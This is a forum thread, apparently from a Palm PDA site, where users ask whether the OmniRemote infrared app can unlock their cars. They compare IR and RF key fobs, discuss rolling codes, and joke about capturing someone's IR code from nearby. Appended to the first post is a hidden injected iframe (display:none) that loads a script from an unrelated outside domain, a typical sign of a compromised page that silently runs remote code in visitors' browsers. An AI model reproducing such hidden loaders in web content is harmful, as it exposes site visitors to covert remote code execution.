+ Reply to Thread

Palm IR car remote

Does anyone know about a program - like Omni-remote - that can be programed to unlock my car? I'd love to get rid of the one on my key chain. It'll be one more thing that I don't have to carry.

Has anyone used the pocket Radio (from ibiz)? I wonder if it works well, or if there are better products like this. (I'm not sure if this is even available, yet. It says that it is available for pre-ordering.)
    http://store.yahoo.com/ibizpda/sdppo.html<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Does anyone know about a program - like Omni-remote - that can be programed to unlock my car?
    Ain't gonna work.
    All care remotes that I know of use radio waves.
    The 7135 is infrared (light).

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Well, if your car was purchased in England (or perhaps other parts of Europe), you might be able to do so -- most cars there use IR instead of RF. People have been using OmniRemote to unlock their cars there (along with passers-by stealing the IR codes)
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

my mercedes ir frequency changes every time you open and close the door.

so you cannot program the phone to open it. ive tried...

Chrysler uses IR (or used to), but is probably code hoping.

Actually, you are right (as usual) HoTSynC.

There is a member of our forum here (not me) who is able to use OmniRemotePro to unlock his Jeep (which is partnered with Chrysler, right?)

I have seen it work. Apparently his old Jeep uses IR instead of RF.
    But my Chrysler Town & Country minivan (did I just admit to owning a minivan?!?!?!) doesn't use IR, so it doesn't work for me.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I am full of useless information

Originally posted by Markito

There is a member of our forum here (not me) who is able to use OmniRemotePro to unlock his Jeep (which is partnered with Chrysler, right?)

I have seen it work. Apparently his old Jeep uses IR instead of RF.
    But my Chrysler Town & Country minivan (did I just admit to owning a minivan?!?!?!) doesn't use IR, so it doesn't work for me.
    It does work But I don't think its code-hopping, cause I only programmed it once & I don't think Omniremote is THAT smart!

I suppose if Markito was hiding in the bushes with his 7135 when I use my IR transmittor (or 7135) to open my Jeep, he could use Omniremote pro to record my IR code.... probably have to be pretty close bushes to do the job though!
    iPhone therefore iAm.

Old audi A4 and S4s have IR remotes too.
    "Why all the pearls, why the blue hair, why anything!?"